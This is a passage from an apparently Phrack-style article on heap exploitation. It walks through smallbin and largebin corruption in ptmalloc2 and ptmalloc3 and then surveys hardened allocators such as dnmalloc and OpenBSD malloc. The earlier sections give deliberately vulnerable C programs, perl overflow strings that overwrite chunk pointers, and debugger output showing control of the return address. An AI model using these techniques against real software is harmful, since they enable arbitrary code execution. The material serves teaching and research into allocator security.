      "4\n" .              # Edit agents[0]
      "BBBBBBBBBBBBBBBBBBBBBBBBBBBB\n"; # Edit lastname agents[0]
                                        # and overwrite a {RET}

---[ end exthl.pl ]---

And here is the result, displaying only the outputs of interest for us:

black@odisea:~/ptmalloc2$ ./exthl | ./agents

[PTMALLOC2] -> (Smallbin code reached)              
[PTMALLOC2] -> (victim = [ 0x8 ])             // Create new agents[0]    
Agent 0 created, now you can edit it                


[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) name [ 0x804f020 ]            // Edit name agents[0]          
Write name for this agent:                            


[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) lastname [ 0x804f048 ]        // Edit lastname agents[0]
Write lastname for this agent:                        

[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) desc [ 0x804f0d0 ]           // Edit description agents[0]                  
Write description for this agent:                     

[PTMALLOC2] -> (Chunk from TOP)                       
Agent 1 created, now you can edit it         // Create new agents[1]
Write agent number:                                   
[+] Agent 0 selected.                        // Select agents[0]         

[PTMALLOC2] -> (Freed and unsorted [ 0x804f040 ] chunk) // Delete lastname

Write agent number:                                    
[+] Agent 1 selected.                        // Select agents[1]           

[PTMALLOC2] -> (Chunk from TOP)                        
[!!!]malloc(ed) desc [ 0x804f1f0 ]           // Edit description agents[1]             
Write description for this agent:                      


Write agent number:                                    
[+] Agent 0 selected.                        // Select agents[0] 

Write name for this agent:                   // Edit name agents[0]                     
Write agent number:                                    
[+] Agent 1 selected.                        // Select agents[1]


[PTMALLOC2] -> (Smallbin code reached)                 
[PTMALLOC2] -> (victim = [ 0x804f048 ])                
[PTMALLOC2] -> (victim->bk = [ 0xbfffee94 ])           

[!!!]malloc(ed) lastname [ 0x804f048 ]
Write lastname for this agent:               // Edit lastname agents[1]

Write agent number:                                   
[+] Agent 0 selected.                        // Select agents[0]          


[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])

[!!!]malloc(ed) lastname [ 0xbfffee9c ]     // Edit lastname agents[0]
Segmentation fault

Everyone can predict what happened in the end, but GDB can clarify for us a
few things:

----- snip -----

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])

[!!!]malloc(ed) lastname [ 0xbfffee9c ]

Program received signal SIGSEGV, Segmentation fault.
0x080490f6 in edit_lastname ()
(gdb) x/i $eip
0x80490f6 <edit_lastname+150>:  ret
(gdb) x/8x $esp
0xbfffee9c:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffeeac:     0x42424242      0x42424242      0x42424242      0x42424242

----- snip -----

And you have moved to the next level of your favorite wargame, or at least
you have increased your level of knowledge and skills. 

Now, I encourage you to compile this program with your regular glibc (not
static Ptmalloc2), and verify that the result is exactly the same, it does
not change the inside code.

I don't know if anyone had noticed, but another of the techniques that in 
principle could be applied to this case is the forgotten The House of 
Prime. The requirement for implementing it is the manipulation of the 
header of two chunks that will be freed. This is possible since an overflow
in agents[]->name can override both agents[]->lastname and agents[]->desc, 
and we can decide both when freeing them and in what order. However, The 
House of Prime needs also at least the possibility of placing an integer
on the stack to overcome a last check and this is where it seems that we
stay trapped. Also, remember that since glibc 2.3.6 one can no longer pass 
to free( ) a chunk smaller than 16 bytes whereas this is the first 
requirement inherent to this technique (alter the size field of the first 
piece overwritten 0x9h = 0x8h + PREV_INUSE bit).

               << It is common sense to take a method and
                  try it; if it fails, admit it frankly and
                  try another. But above all, try something. >>

                                      [ Franklin D. Roosevelt ]

---[ 3 ---[   LargeBin Corruption Method   ]---

In order to apply the method recently explained to a largebin we need the 
same conditions, except that the size of the chunks allocated should be 
above 512 bytes as seen above.

However, in this case the code triggered in "_int_malloc( )" is different 
and more complex. Extra requirements will be necessary in order to achieve 
a successful execution of arbitrary code.

We will make some minor modifications to the vulnerable program presented
in 2.2.1 and will see, through the practice, which of these preconditions
must be met.

Here is the code:

---[ thl-large.c ]---

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void evil_func(void)
    printf("\nThis is an evil function. You become a cool \
              hacker if you are able to execute it\n"); 

void func1(void)
    char *lb1, *lb2;
    lb1 = (char *) malloc(1536);
    printf("\nLB1 -> [ %p ]", lb1);
    lb2 = malloc(1536);
    printf("\nLB2 -> [ %p ]", lb2);

    strcpy(lb1, "Which is your favourite hobby: ");
    printf("\n%s", lb1);
    fgets(lb2, 128, stdin);

int main(int argc, char *argv[])
    char *buff1, *buff2, *buff3;

    buff1 = (char *) malloc(1024);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(2048);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(4096);
    printf("\nBuff3 -> [ %p ]\n", buff3);


    printf("\nBuff4 -> [ %p ]", malloc(4096));

    strcpy(buff1, argv[1]);


    return 0;

---[ end thl-large.c ]---

As you can see, we still need an extra reserve (buff4) after releasing the 
second allocated chunk. This is because it's not a good idea to have a 
corrupted "bk" pointer in a chunk that still is in the unsorted bin. When 
it happens, the program usually breaks sooner or later in the instructions:

      /* remove from unsorted list */
      unsorted_chunks(av)->bk = bck;
      bck->fd = unsorted_chunks(av);

But if we do not make anything wrong before the recently freed chunk is 
placed in its corresponding bin, then we pass without penalty or glory the 
next area code:

    while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {

Having passed this code means that (buff2) has been introduced in its 
corresponding largebin. Therefore we will reach this code:

----- snip -----

    if (!in_smallbin_range(nb)) {
      bin = bin_at(av, idx);

      for (victim = last(bin); victim != bin; victim = victim->bk) {
	size = chunksize(victim);

	if ((unsigned long)(size) >= (unsigned long)(nb)) {
	  printf("\n[PTMALLOC2] No enter here please\n");
	  remainder_size = size - nb;
	  unlink(victim, bck, fwd);

----- snip -----

This does not look good. The unlink( ) macro is called, and we know the 
associated protection since the 2.3.6 version of Glibc. Going there would 
destroy all the work done until now.

Here comes one of the first differences in the largebin corruption method. 
In 2.2.1 we said that after overwriting the "bk" pointer of the free( ) 
chunk, two calls to malloc( ) with the same size should be carried out to 
return a pointer *mem in an arbitrary memory address.

In largebin corruption, we must avoid this code at all cost. For this, the
two calls to malloc( ) must be less than buff2->size. Phantasmal told us 
"512 < M < N", and that is what we see in our vulnerable application:
512 < 1536 < 2048.

As it has not previously been freed any chunk of this size (1536) or at 
least belonging to the same bin, "_int_malloc( )" tries to search a chunk 
that can fulfill the request from the next bin to the recently scanned:

    // Search for a chunk by scanning bins, starting with next largest bin.

    bin = bin_at(av,idx); 

And here is where the magic comes, the following piece of code will be 

----- snip -----

      victim = last(bin);
      else {
        size = chunksize(victim);

        remainder_size = size - nb;

printf("\n[PTMALLOC2] -> (Largebin code reached)");
printf("\n[PTMALLOC2] -> remander_size = size (%d) - nb (%d) = %u", size,
                                                       nb, remainder_size);
printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);
printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", victim->bk);

        /* unlink */
        bck = victim->bk;
        bin->bk = bck;
        bck->fd = bin;

        /* Exhaust */
        if (remainder_size < MINSIZE) {
	  printf("\n[PTMALLOC2] -> Exhaust code!! You win!\n");
          return chunk2mem(victim);

        /* Split */
        else {
          set_foot(remainder, remainder_size);
          check_malloced_chunk(av, victim, nb);
          return chunk2mem(victim);

----- snip -----

The code has been properly trimmed to show only the parts that have 
relevance in the method we are describing. Calls to printf( ) are of my own
and you will soon see its usefulness.

Also it's easy to see that the process is practically the same as in the
smallbin code. You take the last chunk of the respective largebin 
(last(bin)) in "victim" and proceed to unlink it (without macro) before 
reaching the user control. Since we control "victim->bk", at first the
attack requirements are the same, but then, where is the difference?

Calling set_foot( ) tends to produce a segmentation fault since that
"remainder_size" is calculated from "victim->size", value that until now we
were filling out with random data. The result is something like the 

(gdb) run `perl -e 'print "A" x 1036 . "\x44\xf0\xff\xbf"'`                                                                                  

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x8050010 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050418 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050c20 ]

[PTMALLOC2] -> (Freed and unsorted [ 0x8050410 ] chunk)
[PTMALLOC2] -> (Chunk from TOP)
Buff4 -> [ 0x8051c28 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (1094795584) - nb (1544) = 1094794040
[PTMALLOC2] -> (victim = [ 0x8050410 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])

Program received signal SIGSEGV, Segmentation fault.
0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
4144              set_foot(remainder, remainder_size);

The solution is then enforce the conditional:

   if (remainder_size < MinSize) {

Anyone might think of overwriting "victim->size" with a value like 
"0xfcfcfcfc" which would generate as a result a negative number smaller 
than MINSIZE, but we must remember that "remainder_size" is defined as an 
"unsigned long" and therefore the result will always be a positive value.

The only possibility that remains then is that the vulnerable application
allows us to insert null bytes in the attack string, and therefore to 
supply a value as (0x00000610 = 1552) that would generate: 
1552 - 1544 (align) = 8 and the condition would be fulfilled. Let us see in

(gdb) set *(0x08050410+4)=0x00000610        
(gdb) c                                     
Buff4 -> [ 0x8051c28 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (1552) - nb (1544) = 8
[PTMALLOC2] -> (victim = [ 0x8050410 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])

[PTMALLOC2] -> Exhaust code!! You win!

LB1 -> [ 0x8050418 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (-1073744384) - nb (1544) = 3221221368
[PTMALLOC2] -> (victim = [ 0xbffff044 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff651 ])

Program received signal SIGSEGV, Segmentation fault.
0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
4144              set_foot(remainder, remainder_size);

Perfect, we reached the second memory request where we saw that victim is
equal to 0xbffff044 which being returned would provide a chunk whose *mem 
pointes to the stack. However set_foot( ) again gives us problems, and this
is obviously because we are not controlling the "size" field of this fake 
chunk created on the stack.

This is where we have to overcome the latter condition. Victim should point
to a memory location containing user-controlled data, so that we can enter 
an appropriate "size" value and conclude the technique.

We end this section by saying that the largebin corruption method is not 
just pure fantasy as we've made it a reality. However it is true that 
finding the required preconditions of attack in real-life applications is
almost impossible.

As a curious note, one might try to overwrite "victim->size" with 
0xffffffff (-1) and check that on this occasion set_foot( ) seems to follow
its course without breaking the program.

Note: Again we have not tested all versions of glibc, but we noted the
following fixes in advanced versions:

----- snip -----

      else {
        size = chunksize(victim);

        /*  We know the first chunk in this bin is big enough to use. */
        assert((unsigned long)(size) >= (unsigned long)(nb));  <-- !!!!!!!

        remainder_size = size - nb;

        /* unlink */
        unlink(victim, bck, fwd);

        /* Exhaust */
        if (remainder_size < MINSIZE) {
          set_inuse_bit_at_offset(victim, size);
          if (av != &main_arena)
            victim->size |= NON_MAIN_ARENA;

        /* Split */
        else {

----- snip -----

What this means is that the unlink( ) macro has been newly introduced into 
the code, and thus the classic pointer testing mitigate the attack.

               << Insanity is doing the same
                  thing over and over again, and
                  expecting different results. >>

                                   [ Albert Einstein ]

---[ 4 ---[   Analysis of Ptmalloc3   ]---

Delving into the internals of Ptmalloc3, without warm up, may seem violent,
but with a little help it's only a child's game.

In order to understand correctly the next sections, I present here the most
notable differences in the code with respect to Ptmalloc2.

The basic operation remains the same, in the end it's another common memory
allocator, and is also based on a version of Doug Lea allocator but adapted
to work on multiple threads.

For example, here is the chunk definition:

struct malloc_chunk {
  size_t               prev_foot;  /* Size of previous chunk (if free).  */
  size_t               head;       /* Size and inuse bits. */
  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

As we see, the names of our well known "prev_size" and "size" fields have
been changed, but the meaning remains the same. Furthermore we knew three
usual bit control to which they added an extra one called "CINUSE_BIT"
which tells (in a redundant way) that the current chunk is assigned, as
opposed to that PINUSE_BIT that continues to report the allocation of the
previous chunk. Both bits have their corresponding checking and assign

The known "malloc_state" structure now stores the bins into two different
arrays for different uses:

     mchunkptr  smallbins[(NSMALLBINS+1)*2];
     tbinptr    treebins[NTREEBINS];

The first of them stores free chunks of memory below 256 bytes. Treebins[]
is responsible for long pieces and uses a special tree organization. Both
arrays are important in the respective techniques that will be discussed in
the following sections, providing there more details about its management
and corruption.

Some of the areas of greatest interest in "malloc_state" are:

     char*      least_addr;
     mchunkptr  dv;
     size_t     magic;

 * "least_addr" is used in certain macros to check if the address of a
   given P chunk is within a reliable range.

 * "dv", or Designated Victim is a piece that can be used quickly to serve 
   a small request, and to gain efficiency is typically, by general rule, 
   the last remaining piece of another small request. This is a value that
   is used frequently in the smallbin code, and we will see it in the next

 * "Magic" is a value that should always be equal to malloc_params.magic 
   and in principle is obtained through the device "/dev/urandom". This 
   value can be XORed with mstate and written into p->prev_foot for later
   to retrieve the mstate structure of that piece by applying another XOR
   operation with the same value. If "/dev/urandom" can not be used, magic
   is calculated from the time(0) syscall and "0x55555555U" value with 
   other checkups, and if the constant INSECURE was defined at compile 
   time magic then directly take the constant value: "0x58585858U".

For security purposes, some of the most important macros are following:

#define ok_address(M, a) ((char*)(a) >= (M)->least_addr)
#define ok_next(p, n)    ((char*)(p) < (char*)(n))
#define ok_cinuse(p)     cinuse(p)
#define ok_pinuse(p)     pinuse(p)
#define ok_magic(M)      ((M)->magic == mparams.magic)

which could always return true if the constant INSECURE is defined at
compile time (which is not the case by default).

The last macro that you could be observe frequently is "RTCHECK(e)" which 
is nothing more than a wrapper for "__builtin_expect(e, 1)", which in time 
is more familiar from previous studies on malloc.

As we said, "malloc_params" contains some of the properties that can be
established through "mallopt(int param, int value)" at runtime, and
additionally we have the structure "mallinfo" that maintains the global
state of the allocation system with information such as the amount of 
already allocated space, the amount of free space, the number of total free
chunks, etc...

Talking about the management of Mutex and treatment of Threads in Ptmalloc3
is something beyond the scope of this article (and would probably require 
to write an entire book), so we will not discuss this issue and will rather
go forward.

In the next section we see that every precaution that have been taken are 
not sufficient to mitigate the attack presented here.

               << Software is like entropy: It is
                  difficult to grasp, weighs nothing,
                  and obeys the Second Law of Thermodynamics:
                  i.e., it always increases. >>

                                         [ Norman Augustine ]

---[ 4.1 ---[   SmallBin Corruption (Reverse)   ]---

In an attempt to determine whether THoL could be viable in this last
version of Wolfram Gloger. This version have a lot security mechanisms and 
integrity checks against heap overflows, fortunately I discovered a variant
of our smallbin corruption method, this variant could be applied.

To begin, we compile Ptmalloc3 and link the library statically with the
vulnerable application presented in 2.2.1. After using the same method to
exploit that application (by adjusting the evil_func( ) address of course,
which would be our dummy shellcode), we obtain a segment violation at
malloc.c, particularly in the last instruction of this piece of code:

----- snip -----

void* mspace_malloc(mspace msp, size_t bytes) {
  if (!PREACTION(ms)) {
    if (bytes <= MAX_SMALL_REQUEST) {
      if ((smallbits & 0x3U) != 0) {
        b = smallbin_at(ms, idx);
        p = b->fd;
        unlink_first_small_chunk(ms, b, p, idx);

----- snip -----

Ptmalloc3 can use both dlmalloc( ) and mspace_malloc( ) depending on
whether the constant "ONLY_MSPACES" has been defined at compile-time (this 
is the default option -DONLY_MSPACES). This is irrelevant for the purposes 
of this explanation since the code is practically the same for both 

The application breaks when, after having overwritten the "bk" pointer of 
buff2, one requests a new buffer with the same size. Why does it happen?

As you can see, Ptmallc3 acts in an opposite way of Ptmalloc2. Ptmalloc2 
attempts to satisfy the memory request with the last piece in the bin, 
however, Ptmalloc3 intends to cover the request with the first piece of the
bin: "p = b->fd".

mspace_malloc () attempts to unlink this piece of the corresponding bin to 
serve the user request, but something bad happens inside the 
"unlink_first_small_chunk( )" macro, and the program segfaults.

Reviewing the code, we are interested by a few lines:

----- snip -----

#define unlink_first_small_chunk(M, B, P, I) {\
  mchunkptr F = P->fd;\                  [1]
  if (B == F)\
    clear_smallmap(M, I);\
  else if (RTCHECK(ok_address(M, F))) {\ [2]
    B->fd = F;\                          [3]
    F->bk = B;\                          [4]
  else {\

----- snip -----

Here, P is our overwritten chunk, and B is the bin belonging to that piece.
In [1], F takes the value of the "fd" pointer that we control (at the same 
time that we overwrote the "bk" pointer in buff2).

If [2] is overcome, which is a security macro we've seen in the previous

    #define ok_address(M, a) ((char*)(a) >= (M)->least_addr)

where the least_addr field is "the least address ever obtained from 
MORECORE or MMAP"... then anything of higher value will pass this test.

We arrive to the classic steps of unlink, in [3] the "fd" pointer of the 
bin points to our manipulated address. In [4] is where a segmentation 
violation occurs, as it tries to write to (0x41414141)->bk the address of 
the bin. As it falls outside the allocated address space, the fun ends.

For the smallbin corruption technique over Ptmalloc3 it is necessary to 
properly overwrite the "fd" pointer of a freed buffer with a random 
address. After, it is necessary to try making a future call to malloc( ), 
with the same size, that returns the random address as the allocated space.

The precautions are the same as in 2.2.1, F->bk must contain a writable 
address, otherwise it will cause an access violation in [4].

If we accomplish all this conditions, the first chunk of the bin will be 
unlinked and the following piece of code will be triggered.

----- snip -----

        mem = chunk2mem(p);
        check_malloced_chunk(gm, mem, nb);
        goto postaction;

            return mem;

----- snip -----

I added the occasional printf( ) sentence into mspace_malloc( ) and the 
unlink_first_small_chunk( ) macro to see what happened, and the result was 
as follow:

Starting program: /home/black/ptmalloc3/thl `perl -e 'print "A"x24 .
"\x28\xf3\xff\xbf"'` < evil.in                                                                             

[mspace_malloc()]: 16 bytes <= 244
Buff1 -> [ 0xb7feefe8 ]
[mspace_malloc()]: 128 bytes <= 244
Buff2 -> [ 0xb7fef000 ]
Buff3 -> [ 0xb7fef088 ]

Buff4 -> [ 0xb7fef190 ]

[mspace_malloc()]: 128 bytes <= 244
[unlink_first_small_chunk()]: P->fd = 0xbffff328
LB1 -> [ 0xb7fef000 ]

[mspace_malloc()]: 128 bytes <= 244
[unlink_first_small_chunk()]: P->fd = 0xbffff378
LB2 -> [ 0xbffff330 ]

Which is your favourite hobby:
This is an evil function. You become a cool hacker if you are able to
execute it

"244" is the present value of MAX_SMALL_REQUEST, which as we can see, is 
another difference from Ptmalloc2, which defined a smallbin whenever 
requested size was less than 512. In this case the range is a little more 

               << From a programmer's point of view,
                  the user is a peripheral that types
                  when you issue a read request. >>

                                      [ P. Williams ]

---[ 4.2 ---[   LargeBin Method (TreeBin Corruption)   ]---

At this point of the article, we have understood the basic concepts 
correctly. One could now continue to study on his own the Ptmalloc3 

In Ptmalloc3, large chunks (ie larger than 256 bytes), are stored in a tree
structure where each chunk has a pointer to its father, and retains two 
pointers to its children (left and right) if having any. The code that 
defines this structure is the following:

----- snip -----

struct malloc_tree_chunk {
  /* The first four fields must be compatible with malloc_chunk */
  size_t                    prev_foot;
  size_t                    head;
  struct malloc_tree_chunk* fd;
  struct malloc_tree_chunk* bk;

  struct malloc_tree_chunk* child[2];
  struct malloc_tree_chunk* parent;
  bindex_t                  index;

----- snip -----

When a memory request for a long buffer is made, the
"if (bytes <= MAX_SMALL_REQUEST) {}" sentence fails, and the executed code,
if nothing strange happens, is as follow:

----- snip -----

    else {
      nb = pad_request(bytes);
      if (ms->treemap != 0 && (mem = tmalloc_large(ms, nb)) != 0) {
        check_malloced_chunk(ms, mem, nb);
        goto postaction;

----- snip -----

Into tmalloc_large( ), we aim to achieve this code:

----- snip -----

  if (v != 0 && rsize < (size_t)(m->dvsize - nb)) {
    if (RTCHECK(ok_address(m, v))) { /* split */
      if (RTCHECK(ok_next(v, r))) {
        unlink_large_chunk(m, v);
        if (rsize < MIN_CHUNK_SIZE)
          set_inuse_and_pinuse(m, v, (rsize + nb));
        else {
          set_size_and_pinuse_of_inuse_chunk(m, v, nb);
          set_size_and_pinuse_of_free_chunk(r, rsize);
          insert_chunk(m, r, rsize);
        return chunk2mem(v);

----- snip -----

If we tried to exploit this program in the same way as for Ptmalloc2, the
application would break first in the "unlink_large_chunk( )" macro, which 
is very similar to "unlink_first_small_chunk( )". The most important lines 
of this macro are these:

    F = X->fd;\ [1]
    R = X->bk;\ [2]
    F->bk = R;\ [3]
    R->fd = F;\ [4]

Thus we now know that both the "fd" and "bk" pointers of the overwritten
chunk must be pointing to writable memory addresses, otherwise this could
lead to an invalid memory access.

The next error will come in: "set_size_and_pinuse_of_free_chunk(r, rsize)",
which tells us that the "size" field of the overwritten chunk must be
user-controlled. And so again, we need the vulnerable application to allow
us introducing NULL bytes.

If we can accomplish this, the first call to "malloc(1536)" of the 
application shown in section 3 will be executed correctly, and the issue 
will come with the second call. Specifically within the loop:

----- snip -----

  while (t != 0) { /* find smallest of tree or subtree */
    size_t trem = chunksize(t) - nb;
    if (trem < rsize) {
      rsize = trem;
      v = t;
    t = leftmost_child(t);

----- snip -----

When you first enter this loop, "t" is being equal to the address of the 
first chunk in the tree_bin[] corresponding to the size of the buffer 
requested. The loop will continue while "t" has still some son and, finally
"v" (victim) will contain the smallest piece that can satisfy the request.

The trick for saving our problem is to exit the loop after the first 
iteration. For this, we must make "leftmost_child(t)" returning a "0" 

Knowing the definition:

#define leftmost_child(t) ((t)->child[0] != 0? (t)->child[0]:(t)->child[1])

The only way is to place (buff2->bk) in an address of the stack. It is 
necessary the pointers child[0] and child[1] with a "0" value, which means 
no more children. Then "t" (and therefore "v") will be provided while the 
"size" field not fails the if( ) sentence.

               << Before software should be
                  reusable, it should be usable. >>

                                  [ Ralph Johnson ] 

---[ 4.3 ---[   Implement Security Checks   ]---

Ptmalloc3 could be safer than it seems at first, but for this, you should
have defined the FOOTERS constant at compile time (which is not the default

We saw the "magic" parameter at the beginning of section 4, which is 
present in all malloc_state structures and the way in which it is 
calculated. The reason why "prev_size" now is named as "prev_foot" if that 
if FOOTERS is defined, then this field is used to store the result of a XOR
operation between the mstate belonging to the chunk and the magic value 
recently calculated. This is done with:

/* Set foot of inuse chunk to be xor of mstate and seed */
#define mark_inuse_foot(M,p,s)\
 (((mchunkptr)((char*)(p)+(s)))->prev_foot = ((size_t)(M) ^ mparams.magic))

XOR, as always, remains being a symmetric encryption that allows, at the 
same time, saving the malloc_state address and establishing a kind of 
cookie to prevent a possible attack whenever altered. This mstate is 
obtained with the following macro:

#define get_mstate_for(p)\
  ((mstate)(((mchunkptr)((char*)(p) +\
    (chunksize(p))))->prev_foot ^ mparams.magic))

For example, at the beginning of the "mspaces_free( )" function which is 
called by the wrapper free( ), is started in this way:

   #if FOOTERS
       mstate fm = get_mstate_for(p);
   #else /* FOOTERS */
       mstate fm = (mstate)msp;
   #endif /* FOOTERS */
       if (!ok_magic(fm)) {
         USAGE_ERROR_ACTION(fm, p);

If we corrupt the header of an allocated chunk (and therefore the prev_foot
field). When the chunk was freed, get_mstate_for( ) will return an 
erroneous arena. At this moment ok_magic( ) will test the "magic" value of 
that area and it will abort the application.

Moreover, one must be aware that the current flow could be broken even
before the USAGE_ERROR_ACTION( ) call if the reading of fm->magic causes a 
segmentation fault due to wrong value obtained by get_mstate_for( ).

How to deal with this cookie and the probability analysis in order to
predict its value at runtime is an old issue, and we will not talk more
here about it. Though one could remember the PaX case, perhaps an 
overwritten pointer can point beyond the "size" field of a chunk, and 
through a future STRxxx( ) or MEMxxx( ) call, crush their data without have
altered "prev_foot". Skape made an excellent job in his "Reducing the 
effective entropy of gs cookies" [4] for the Windows platform. It could 
give you some fantastic ideas to apply. Who knows, it all depends on the 
vulnerability and inherent requirements of the tested application. 

What is the advantage of THoL according to this protection? It is very 
clear, the target chunk is corrupted after its release, and therefore the 
integrity checks are passed.

Anyway, there should be ways to mitigate these kinds of problems, to start,
if we all know that no memory allocation should proceed belonging to a 
stack location, one could implement something as simple as this:

#define STACK_ADDR 0xbff00000

#define ok_address(M, a) (((char*)(a) >= (M)->least_addr)\
			  && ((a) <= STACK_ADDR))

and the application is aborted before getting a successful exploitation.
Also a check as ((a) >> 20) == 0xbff) should be effective. It is only an
example, the relative stack position could be very different in your 
system, it is a very restrictive protection.

Anyone who read the source code base has probably noticed that Ptmalloc3's
unlink...( ) macros omit the classic tests that implanted in glibc to check
the double linked list. We do not consider this because we know that a real
implementation would take it into account and should add this integrity 
check. However, I can not perform a more detailed stud until someone 
decides in a future that glibc will be based on Ptmalloc3.

The conclusion of this overview is that some of the techniques detailed in
the Maleficarum & Des-Maleficarum papers are not reliable in Ptmalloc3. One
of them, for example, is The House of Force. Remember that it needs both to 
overwrite the "size" field of the wilderness chunk and a request with a 
user-defined size. This was possible partly in Ptmalloc2 because the size 
of the top chunk was read in this way:

    victim = av->top;
    size = chunksize(victim);

Unfortunately, now Ptmalloc3 saves this value in the "malloc_state" and 
reads it directly with this:

   size_t rsize = (g)m->topsize // gm for dlmalloc( ), m for 
                                // mspace_malloc( )

In any case, it is worth recalling one of the comments present at the 
beginning of "malloc.c":

     "This is only one aspect of security -- these checks do not,
      and cannot, detect all possible programming errors".

               << Programming without an overall architecture
                  or design in mind is like exploring a cave
                  with only a flashlight: You don't know where
                  you've been, you don't know where you're going,
                  and you don't know quite where you are. >>

                                                 [ Danny Thorpe ]

---[ 4.3.1 ---[   Secure Heap Allocator (Utopian)   ]---

First, there is no way to create a "heap allocator" totally secure, it's
impossible (note: you can design the most secure allocator in the world but
if it's too slow => it's no use). To begin with, and the main rule (which
is fairly obvious), implies that the control structures or more simply,
headers, can not be located being adjacent to the data. Create a macro that
adds 8 bytes to the address of a header for direct access to data is very
simple, but has never been a safe option.

However, although this problem will be solved, still others thought to
corrupt the data of another allocated chunk is not useful if it not allows
arbitrary code execution, but and if these buffers contain data whose
integrity has to be guaranteed (financial information, others...)?

Then we came to the point in which it is essential the use cookies between 
the fragments of memory assigned. It obviously has side effects. The most
efficient would be that this cookie (say 4 bytes) will be the last 4 bytes
of each allocated chunk, with the target of preserve the alignment, since
that put them between two  chunks required a more complicated and possibly
slower management.

Besides this, we could also take ideas from "Electric Fence - Red-Zone
memory allocator" by Bruce Perens [5]. His protection ideas are:

   - Anti Double Frees:

	if ( slot->mode != ALLOCATED ) {
 		if ( internalUse && slot->mode == INTERNAL_USE )
		else {
			EF_Abort("free(%a): freeing free memory.",address);

   - Free unallocated space (EFense maintains an array of addresses
     of chunks allocated (slots) ):

	slot = slotForUserAddress(address);
	if ( !slot )
		EF_Abort("free(%a): address not from malloc().", address);

Other implementations of dynamic memory management that we should take into
account: Jemalloc on FreeBSD [6] and Guard Malloc for Mac OS X [7].

The first is specially designed for concurrent systems. We talked about
management of multiple threads on multiple processors, and how to achieve 
this efficiently, without affecting system performance, and getting better 
times in comparison with other memory managers.

The second, to take one example, use the pagination and its mechanism of
protection in a very clever way. Extracted directly from the manpage, we 
read the core of his method:

   "Each malloc allocation is placed on its own virtual memory page, with 
    the end of the buffer at the end of the page's memory, and the next 
    page is kept unallocated. As a result, accesses beyond the end of the 
    buffer cause a bus error immediately. When memory is freed, libgmalloc 
    deallocates its virtual memory, causing reads or writes to the freed 
    buffer cause a bus error."

Note: That's a really interesting idea but you should take into account the
fact that such a technic is not _that_ effective because if would sacrifice
a lot of memory. It would induce a PAGE_SIZE (4096 bytes is a common value,
or getpagesize( ) ;) allocation for a small chunk.

In my opinion, I do not see Guard Malloc as a memory manager of routine 
use, but rather as an implementation with which to compile your programs in
the early stages of development/debugging.

However, Guard Malloc is a highly user-configurable library. For example,
you could allow through an specific environment variable 
(MALLOC_ALLOW_READS) to read past an allocated buffer. This is done by 
setting the following virtual page as Read-Only. If this variable is 
enabled along with other specific environment variable 
(MALLOC_PROTECT_BEFORE), you can read the previous virtual page. And still 
more, if MALLOC_PROTECT_BEFORE is enabled without MALLOC_ALLOW_READS buffer
underflow can be detected. But this is something that you can read in the 
official documentation, and it's needless to say more here.

               << When debugging, novices insert corrective
                  code; experts remove defective code. >>

                                         [ Richard Pattis ]

---[ 4.3.2 ---[   dnmalloc   ]---

This implementation (DistriNet malloc) [10] is like the most modern 
systems: code and data are loaded into separate memory locations, dnmalloc 
applies the same to chunk and chunk information which are stored in 
separate contiguous memory protected by guard pages. A hashtable which 
contains pointers to a linked list of chunk information accessed through 
the hash function is used to associate chunks with the chunks information.

Memory with dnmalloc:

        |  .text        |
        |  .data        |
        |  Chunks        |
        |  Memory Page       | <- This Page is not writable
        |  Chunk Information |
        |  The Hash Table    |
        |  Memory Page       | 
        |  The Stack         | <- This Page is not writable

The way to find the chunk information:

1.- Address of the chunk - Start address of the heap = *Result*

2.- To get the entry in the Hash Table: shift *Result* 7 bits to the right.

3.- Go over the linked list till it have the correct chunk.

 |           The Hash Table            |
 . ................................... . 
 |  Pointers to each Chunk Information | --> Chunk Information (Hash Next 
 .-------------------------------------.     to the next Chunk Information)

The manipulation of the Chunk Information:

1.- A fixed area is mapped below the Hash table for the Chunks Information.

2.- Free Chunk Information are stored in a linked list.

3.- When a new Chunk Information is needed the first element in the free 
    list is used.

4.- If none are free a Chunk is allocated from the map.

5.- If the map is empty It maps extra memory for it (and move the guard 

6.- Chunk information is protected by guard pages.

               << Passwords are like underwear: you don't let
                  people see it, you should change it very often,
                  and you shouldn't share it with strangers. >>

                                                [ Chris Pirillo ] 

---[ 4.3.3 ---[   OpenBSD malloc   ]---

This implementation [11] [13] have the design goals: simple, unpredictable,
fast, less metadata space overhead, robust for example freeing of a bogus 
pointer or a double free should be detected ... 

About the Metadata: keep track of mmaped regions by storing their address 
and size into a hash table, keep existing data structure for chunk 
allocations, a free region cache with a fixed number of slots:

Free regions cache

1.- Regions freed are kept for later reuse

2.- Large regions are unmapped directly

3.- If the number of pages cached gets too large, unmap some.

4.- Randomized search for fitting region, so region reuse is less

5.- Optionally, pages in the cache are marked PROT_NONE

